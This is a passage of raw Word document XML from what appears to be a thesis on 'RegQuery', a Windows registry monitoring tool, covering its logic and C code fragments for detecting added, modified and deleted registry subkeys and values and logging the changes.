        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>key added to the registry database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Its information could have been added to the last position in the current subkey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">chain. (This is only right for almost key. There </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> some key that has its subkey position arranged by a third party process. Windows Services is an example.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nCount ==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0, there was a subkey modified in registry database. In this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we only identified for change in subkey name. When a subkey change its name, it should be move to the last position in the subkey chain.</w:t>
      </w:r>
      <w:r w:rsidR="003F590C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, the previous subkey in the last query is now different from the current subkey in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If nCount &gt; 0, there was a subkey deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002935B6" w:rsidRDefault="002935B6" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="003C1ED4" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In the situation when nCount &lt;= 0, the last subkey in the chain is suspicious.</w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In case nCount &lt; 0, we log the subkey which is in the last position of the current subkey chain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When nCount = 0, if the name of subkey in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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((cSubKeys - 1 == i) &amp;&amp; aft &amp;&amp; (nCount &gt; 0)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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L"DEBUG TIME: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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L"Key added: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wchLogKey);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achKey);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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));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0;</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((cSubKeys - 1 == i) &amp;&amp; aft &amp;&amp; (nCount == 0) &amp;&amp; (cSubKeys &gt; 0)) {</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//If the name of the subkey in the last pos</w:t>
      </w:r>
      <w:r w:rsidR="00B728B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ition is diffe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rent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//from the previous query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wcscmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName, achKey)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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L"DEBUG TIME: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,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L"Key modified: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wchLogKey);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achKey);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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));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0;</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D15150" w:rsidRDefault="00D15150" w:rsidP="00B728B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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00B728B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743CCD" w:rsidRDefault="00F05F19" w:rsidP="00D15150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The logging procedure is quite simple. RegQuery first get the time when change happened, then concatenate that time and added information about the registry subkey which is changed and called a function for writing that information out. We will discuss the logging procedure in a later section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00F05F19" w:rsidP="00743CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Like</w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the procedure for monitoring subkeys, when the current number of value is larger than 0, RegQuery read every value information of that key using a Windows API called “RegEnumValue”.</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the process for monitoring subkeys, “RegEnumValue” also return a “retCode” which is a value indicating the return code of the calling function.</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(i=0, retCode=ERROR_SUCCESS; i&lt;cValues; i++)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cchValue = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_VALUE_NAME</w:t>
      </w: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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>achValue[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">0] = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>'\0'</w:t>
      </w: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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegEnumValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, i,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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achValue,  </w:t>
      </w:r>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 the return value name</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&amp;cchValue, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// value name's size</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(retCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D4C" w:rsidRDefault="00581DDE" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>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 listing value for monitor and debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00DB2D4C" w:rsidRDefault="002565A7" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery also defines an “nCount” indicating the different between the previous number of value and the current number of value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> nCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; cValues) &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>nCount = cValues - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C60196">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81DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount &lt; 0, there was a value added to the registry database. Its information could have been added to the last position in the current value chain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRPr="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount == 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> modified in registry database. In this </w:t>
      </w:r>
      <w:r w:rsidR="0093414E" w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thesis,</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> only identified for change in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name. When a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> its name, it should be move to the last position in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chain. Therefore, the previous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s name</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the last query is now different from the current </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If nCount &gt; 0, there was a value deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRPr="009B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
